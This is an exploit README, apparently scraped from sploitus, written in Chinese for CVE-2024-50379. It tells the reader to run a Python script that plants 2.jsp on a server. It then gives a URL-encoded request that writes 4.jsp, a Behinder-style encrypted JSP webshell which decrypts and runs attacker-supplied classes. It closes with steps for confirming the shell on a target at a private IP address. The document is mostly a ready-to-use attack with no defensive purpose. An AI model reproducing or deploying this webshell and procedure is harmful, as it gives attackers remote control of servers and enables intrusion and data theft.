Share
## https://sploitus.com/exploit?id=2666ADB9-9A8B-59E9-85B8-22B7F336AE7E
# CVE-2024-50379
CVE-2024-50379利用
CVE-2024-50379.py和upload.txt在同一目录
upload内容为马子
这里的upload内容为生成一个2.jsp的文件
可通过2.jsp创建一个新的4.jsp的原版冰蝎
2.jsp?f=4.jsp&t=%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%78%2e%63%72%79%70%74%6f%2e%2a%2c%6a%61%76%61%78%2e%63%72%79%70%74%6f%2e%73%70%65%63%2e%2a%22%25%3e%3c%25%21%63%6c%61%73%73%20%55%20%65%78%74%65%6e%64%73%20%43%6c%61%73%73%4c%6f%61%64%65%72%7b%55%28%43%6c%61%73%73%4c%6f%61%64%65%72%20%63%29%7b%73%75%70%65%72%28%63%29%3b%7d%70%75%62%6c%69%63%20%43%6c%61%73%73%20%67%28%62%79%74%65%20%5b%5d%62%29%7b%72%65%74%75%72%6e%20%73%75%70%65%72%2e%64%65%66%69%6e%65%43%6c%61%73%73%28%62%2c%30%2c%62%2e%6c%65%6e%67%74%68%29%3b%7d%7d%25%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%4d%65%74%68%6f%64%28%29%2e%65%71%75%61%6c%73%28%22%50%4f%53%54%22%29%29%7b%53%74%72%69%6e%67%20%6b%3d%22%65%34%35%65%33%32%39%66%65%62%35%64%39%32%35%62%22%3b%2f%2a%e5%c6%a5%3a%de%a5%c6%01%33%32%4d%6d%64%35%3c%84%4d%31%36%4d%0c%d8%a4%de%a5%c6%01%72%65%62%65%79%6f%6e%64%2a%2f%73%65%73%73%69%6f%6e%2e%70%75%74%56%61%6c%75%65%28%22%75%22%2c%6b%29%3b%43%69%70%68%65%72%20%63%3d%43%69%70%68%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%22%41%45%53%22%29%3b%63%2e%69%6e%69%74%28%32%2c%6e%65%77%20%53%65%63%72%65%74%4b%65%79%53%70%65%63%28%6b%2e%67%65%74%42%79%74%65%73%28%29%2c%22%41%45%53%22%29%29%3b%6e%65%77%20%55%28%74%68%69%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%43%6c%61%73%73%4c%6f%61%64%65%72%28%29%29%2e%67%28%63%2e%64%6f%46%69%6e%61%6c%28%6e%65%77%20%73%75%6e%2e%6d%69%73%63%2e%42%41%53%45%36%34%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%42%75%66%66%65%72%28%72%65%71%75%65%73%74%2e%67%65%74%52%65%61%64%65%72%28%29%2e%72%65%61%64%4c%69%6e%65%28%29%29%29%29%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%29%2e%65%71%75%61%6c%73%28%70%61%67%65%43%6f%6e%74%65%78%74%29%3b%7d%25%3e
当运行的py文件提示链接超时或者访问网站无法访问的时候就断掉py脚本
访问
http://192.168.36.148:8080/2.jsp
看是否返回seccess 2.jsp! seccess
如果有这个文件但是返回为空则说明肯定有这个漏洞但是并发的时候吧文件覆盖了但是数据没写进去,
则尝试访问1.jsp如果也没有就重新跑脚本。
http://192.168.36.148:8080/1.jsp